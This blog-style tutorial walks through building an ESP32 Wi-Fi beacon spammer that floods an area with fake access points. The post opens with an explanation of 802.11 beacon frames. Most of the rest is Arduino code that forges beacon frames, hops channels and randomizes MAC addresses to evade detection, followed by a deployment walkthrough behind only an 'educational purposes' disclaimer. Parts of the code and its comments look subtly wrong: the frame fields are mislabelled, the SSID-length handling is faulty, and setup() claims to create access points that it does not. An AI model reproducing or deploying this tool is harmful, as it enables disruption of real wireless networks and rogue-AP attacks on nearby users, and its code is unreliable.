Welcome#

Creating a Beacon Spammer for Educational Purposes

Understanding how certain attacks work is crucial for developing effective defense strategies. One such attack vector is known as a “beacon spammer,” which floods a network with fake Wi-Fi access points (APs) to confuse or overwhelm devices seeking connections. While the use of such tools for malicious purposes is unethical and illegal, studying their inner workings can provide valuable insights into network security.

WARNING

FOR EDUCATIONAL PURPOSES ONLY!#

Unauthorized use is strictly prohibited.#

for this tutorial we’ll be using an ESP32 micro-controller to conduct our operation, to set up a developement environment you’ll need to download and install Espressif IoT Development Framework, then you can follow the steps to set it up and create a new project.

With that being said, let’s get started:

What is a Beacon:#

A beacon is a type of management frame in the IEEE 802.11 (Wi-Fi) protocol suite. It is periodically broadcasted by Wi-Fi APs to announce their presence and provide essential information about the network. Beacons are broadcasted on a specific channel and are part of the beacon frame category.

Purpose of Beacons:#

The primary purpose of beacons is to allow nearby Wi-Fi client devices to discover and connect to wireless networks. When a device (such as a laptop, smartphone, or IoT device) wants to connect to a Wi-Fi network, it listens for beacon frames from nearby APs. These beacons contain information such as the network’s SSID (Service Set Identifier), supported data rates, security settings, and other network parameters.

Beacon Content:#

A typical beacon frame contains various fields, including:

SSID: The name of the network, which identifies it to clients.

BSSID: The MAC address of the AP broadcasting the beacon.

Supported Rates: The data rates supported by the network.

Capabilities: Information about the network’s capabilities, such as whether it supports WPA/WPA2 encryption or otherfeatures.

Timestamp: A timestamp indicating when the beacon was sent.

Channel Information: Information about the Wi-Fi channel on which the AP is operating.

enough theory for now, let’s jump to the code

// Include necessary libraries
#include <WiFi.h>
#include "esp_wifi.h"  //because we'll be using an esp32

// Define a beacon packet buffer
uint8_t packet[128] = {0x80, 0x00, 0x00, 0x00,  /* Beacon frame header */
                        /* MAC addresses */
                        0xff, 0xff, 0xff, 0xff, 0xff, 0xff,  /* Destination MAC address */
                        0x01, 0x02, 0x03, 0x04, 0x05, 0x06,  /* Source MAC address */
                        /* Sequence control */
                        0x01, 0x02,  /* Fragment number and sequence number */
                        /* Frame control */
                        0xc0, 0x6c,  /* Frame control flags */
                        /* Timestamp and beacon interval */
                        0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00,  /* Timestamp */
                        0x64, 0x00,  /* Beacon interval */
                        /* Capability information */
                        0x01, 0x04,  /* Capability information flags */
                        /* SSID */
                        0x00, 0x06, 0x72, 0x72, 0x72, 0x72, 0x72, 0x72,  /* SSID: "rrrrrrr" */
                        /* Remaining fields */
                        0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, 0x03, 0x01,  /* Other fields */
                        /* End of frame */
                        0x04};

 const char *names[] = {...};  // List of fake SSIDs

 
void setup() {
  Serial.begin(115200);  

  WiFi.mode(WIFI_STA);  

   for (int i = 0; i < 100; ++i) {
    WiFi.begin(names[i], "password");   

    // Print information about created Wi-Fi access point
    Serial.print("Created Wi-Fi access point: ");
    Serial.println(names[i]);
    Serial.print("IP address: ");
    Serial.println(WiFi.localIP());
  }
}

 
void loop() {
  // Iterate through fake SSIDs
  for (int i = 0; i < sizeof(names) / sizeof(names[0]); ++i) {

    // Set Wi-Fi channel randomly
    esp_wifi_set_channel(random(1, 14), WIFI_SECOND_CHAN_NONE);

    // Randomize source MAC address
    for (int j = 10; j <= 21; j++) {
      packet[j] = random(256);
    }

    // Set SSID to the current name from names list
    const char *ssid = names[i];
    int ssidLength = strlen(ssid);
    packet[36] = ssidLength >> 8;  // High byte of SSID length
    packet[37] = ssidLength & 0xFF;  // Low byte of SSID length
    for (int j = 0; j < ssidLength; j++) {
      packet[38 + j] = ssid[j];  // Set SSID bytes
    }

    // Transmit the modified beacon packet
    esp_wifi_80211_tx(WIFI_IF_STA, packet, 38 + ssidLength, false);

    delay(1);  // Delay to avoid overwhelming the network
  }
}

Step-by-Step Guide

Now, let’s break down the steps involved in creating and deploying our beacon spammer:

1. Include Necessary Libraries: At the beginning of our code, we include the required libraries, namely WiFi.h and esp_wifi.h, which provide functionalities for Wi-Fi communication and ESP32 Wi-Fi features, respectively.

2. Define Beacon Packet Structure: We define a buffer named packet to hold the structure of a beacon frame. This frame includes various fields such as MAC addresses, frame control, timestamp, beacon interval, capability information, and SSID.

3. Create Fake SSID List: We define an array named names that contains a large number of fake SSIDs. These SSIDs are randomly generated and are meant to mimic legitimate Wi-Fi networks.

4. Setup Function: In the setup() function, we initialize serial communication and set the Wi-Fi mode to station (client). We then iterate through the list of fake SSIDs and attempt to connect to each one using a predefined password.

5. Loop Function: The loop() function continuously runs after the setup phase. It iterates through the list of fake SSIDs and performs the following actions:

   • Sets a random Wi-Fi channel to simulate multiple access points.
   • Randomizes the source MAC address in the beacon packet to avoid detection.
   • Sets the SSID in the packet to the current fake SSID.
   • Transmits the modified beacon packet using the esp_wifi_80211_tx() function.
   • Introduces a small delay to prevent overwhelming the network.

Why is beacon spammer evil:#

beacon spammer can be used for malicious purposes such as deauth attack or fake AP creation which can cause disruption, it can even be used for Men in the middle attack, so the next time when you’re at your local cafe, pay attention before connecting to the free wifi ;)

Conclusion

I hope you liked this article and gained some knoweledge about this type of attack. It’s important to emphasize that this knowledge should be used responsibly and ethically, and any experimentation should be conducted in controlled environments with appropriate permissions.